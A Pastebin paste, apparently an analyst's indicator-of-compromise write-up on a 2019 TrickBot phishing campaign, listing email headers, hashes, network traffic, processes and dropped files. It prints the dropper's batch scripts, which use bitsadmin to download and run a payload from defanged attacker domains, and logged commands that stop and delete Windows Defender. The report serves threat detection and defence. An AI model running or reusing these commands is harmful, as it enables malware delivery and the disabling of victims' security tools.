API tools faq
paste
Advertisement
VRad

#trickbot_070319

VRad
Mar 10th, 2019
460
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.36 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #trickbot #W97M #AutoClose #BAT #BITS
  2.  
  3. https://pastebin.com/Vt02288z
  4.  
  5. previous contact:
  6. 06/02/19 https://pastebin.com/70KhU3a4
  7. 05/10/18 https://pastebin.com/75KNqwCf
  8. 02/10/18 https://pastebin.com/fm5Ug69G
  9. 24/09/18 https://pastebin.com/LjuNyGfn
  10.  
  11. FAQ:
  12. https://radetskiy.wordpress.com/2018/10/19/ioc_trickbot_051018/
  13. https://myonlinesecurity.co.uk/fake-paychex-tax-verification-documents-delivers-trickbot/
  14. https://github.com/DidierStevens/DidierStevensSuite/blob/master/vba.yara
  15.  
  16. attack_vector
  17. --------------
  18. email attach .doc > macro_AutoClose > 4 bat > BITS > GET > AppData\Roaming\wnetwork\*.exe
  19.  
  20. email_headers
  21. --------------
  22. Received: from paychex.email ([95.211.163.2])
  23. Received: by paychex.email for <user00@org88.victim0.com>;
  24. (envelope-from <J.Clark-user00=org88.victim0.com@paychex.email>)
  25. Subject: RE: Tax verification documents
  26. From: "Jeff Clark - Paychex" <J.Clark@paychex.email>
  27. Date: Thu, 7 Mar 2019 14:33:37 -0500
  28. To: user00@org88.victim0.com
  29.  
  30. files
  31. --------------
  32. SHA-256 a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625
  33. File name Verification_Documents.doc [Composite Document File V2 Document, Little Endian]
  34. File size 100.5 KB
  35.  
  36. SHA-256 da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd
  37. File name za.ebali [PE32 executable (GUI) Intel 80386, for MS Windows]
  38. File size 245 KB
  39.  
  40. activity
  41. **************
  42. Yahhop1.bat
  43. --------------
  44. cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\@n10FGA.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
  45.  
  46. Yahhop2.bat
  47. --------------
  48. cmd /r cmd /c ping -n 2 yasgold{.} com
  49. if %errorlevel%==0 (set slomw=yasgold{.} com) else (set slomw=mitreart{.} com)
  50.  
  51. Yahhop3.bat
  52. --------------
  53. cmd /r cmd /c %temp%\@n10FGA /reset && %temp%\@n10FGA /CREATE /DOWNLOAD Taur && %temp%\@n10FGA /setNoProgressTimeout Taur 300 && %temp%\@n10FGA /setMinRetryDelay Taur 7 && %temp%\@n10FGA /ADDFILE Taur http://%slomw%/za.ebali %temp%\ebali.exe && %temp%\@n10FGA /SetSecurityFlags Taur 30 && %temp%\@n10FGA /SETMAXDOWNLOADTIME Taur 500 && %temp%\@n10FGA /SetPeerCachingFlags Taur 3 && %temp%\@n10FGA /RESUME Taur && timeout /t 147 /nobreak && %temp%\@n10FGA /COMPLETE Taur
  54.  
  55. Yahhop4.bat
  56. --------------
  57. cmd /r cmd /c timeout /t 5 /nobreak && %temp%\ebali.exe && del /f /q %temp%\Yahhop1.bat %temp%\Yahhop2.bat %temp%\Yahhop3.bat %temp%\Yahhop4.bat %temp%\Yahhop5.bat %temp%\@n10FGA.exe
  58.  
  59. @
  60.  
  61. PL_SRC: http://yasgold{.} com/za.ebali
  62. http://mitreart{.} com/za.ebali
  63.  
  64. netwrk
  65. --------------
  66. http
  67. 185.56.145.142 yasgold{.} com HEAD /za.ebali HTTP/1.1 Microsoft BITS/7.5
  68. 116.203.16.95 ip.anysrc.net GET /plain HTTP/1.1 Mozilla/5.0
  69. 67.27.235.254 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1 Microsoft-CryptoAPI/6.1
  70.  
  71. ssl
  72. 185.174.174.15
  73. 82.146.57.38
  74. 195.123.246.121
  75.  
  76. comp
  77. --------------
  78. svchost.exe 872 TCP localhost 49376 185.56.145.142 80 ESTABLISHED
  79. svchost.exe 1688 TCP localhost 49377 116.203.16.95 80 ESTABLISHED
  80. svchost.exe 1688 TCP localhost 49378 177.107.51.162 449 SYN_SENT
  81. svchost.exe 1688 TCP localhost 49381 138.204.132.88 449 SYN_SENT
  82. svchost.exe 1688 TCP localhost 49385 67.27.235.254 80 ESTABLISHED
  83. svchost.exe 1688 TCP localhost 49384 185.174.174.15 443 ESTABLISHED
  84. svchost.exe 1688 TCP localhost 49386 82.146.57.38 443 ESTABLISHED
  85. svchost.exe 1688 TCP localhost 49389 195.123.246.121 443 ESTABLISHED
  86.  
  87. proc
  88. --------------
  89. 1st
  90. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  91. C:\Windows\SysWOW64\cmd.exe cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\00JO0!l.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
  92. C:\Windows\SysWOW64\cmd.exe /c copy /Y /V C:\Windows\system32\bitsadmin.exe C:\tmp\00JO0!l.exe
  93. C:\Windows\SysWOW64\cmd.exe /r cmd /c ping -n 2 yasgold{.} com
  94. C:\Windows\SysWOW64\cmd.exe /c ping -n 2 yasgold{.} com
  95. C:\Windows\SysWOW64\PING.EXE -n 2 yasgold{.} com
  96. C:\Windows\SysWOW64\cmd.exe /r cmd /c C:\tmp\00JO0!l /reset
  97. C:\Windows\SysWOW64\cmd.exe /c C:\tmp\00JO0!l /reset
  98. C:\tmp\00JO0!l /reset
  99.  
  100. C:\tmp\00JO0!l /CREATE /DOWNLOAD Taur
  101. C:\tmp\00JO0!l /setNoProgressTimeout Taur 300
  102. C:\tmp\00JO0!l /setMinRetryDelay Taur 7
  103. C:\tmp\00JO0!l /ADDFILE Taur http://yasgold{.} com/za.ebali C:\tmp\ebali.exe
  104. C:\tmp\00JO0!l /SetSecurityFlags Taur 30
  105. C:\tmp\00JO0!l /SETMAXDOWNLOADTIME Taur 500
  106. C:\tmp\00JO0!l /SetPeerCachingFlags Taur 3
  107. C:\tmp\00JO0!l /RESUME Taur
  108. C:\Windows\SysWOW64\timeout.exe timeout /t 147 /nobreak
  109. C:\tmp\00JO0!l /COMPLETE Taur
  110.  
  111. C:\Windows\SysWOW64\cmd.exe /r cmd /c timeout /t 5 /nobreak
  112. C:\tmp\ebali.exe
  113. C:\Windows\system32\cmd.exe /c sc stop WinDefend
  114. C:\Windows\system32\cmd.exe /c sc delete WinDefend
  115. C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  116.  
  117. C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
  118. C:\Windows\system32\cmd.exe /c sc stop WinDefend
  119. C:\Windows\system32\cmd.exe /c sc delete WinDefend
  120. C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  121. C:\Windows\system32\svchost.exe
  122.  
  123. 2nd
  124. C:\Windows\system32\svchost.exe -k netsvcs
  125. C:\Windows\system32\taskeng.exe {4A5E0F1F-7A3C-4339-A10A-8292EA54F4A0} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
  126. C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
  127. C:\Windows\system32\cmd.exe /c sc stop WinDefend
  128. C:\Windows\system32\cmd.exe /c sc delete WinDefend
  129. C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  130. C:\Windows\system32\svchost.exe
  131.  
  132. persist
  133. --------------
  134. \Windows Network
  135. c:\users\operator\appdata\roaming\wnetwork\ebamj.exe 07.03.2019 18:12
  136.  
  137. drop
  138. --------------
  139. C:\tmp\VBE\MSForms.exd
  140. C:\tmp\Yahhop1.bat [removed]
  141. C:\tmp\Yahhop2.bat [removed]
  142. C:\tmp\Yahhop3.bat [removed]
  143. C:\tmp\Yahhop4.bat [removed]
  144. C:\tmp\00JO0!l.exe [removed]
  145. C:\tmp\BIT7B59.tmp [removed]
  146. C:\tmp\ebali.exe
  147.  
  148. C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
  149. C:\Users\operator\AppData\Roaming\wnetwork\Greenshot.ini
  150. C:\Users\operator\AppData\Roaming\wnetwork\Data
  151.  
  152. # # #
  153. https://www.virustotal.com/#/file/a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625/details
  154. https://www.virustotal.com/#/file/da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd/details
  155. https://analyze.intezer.com/#/analyses/b11279cb-4c9a-4e59-8605-e6a96c078034
  156.  
  157. VR
  158.  
  159. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!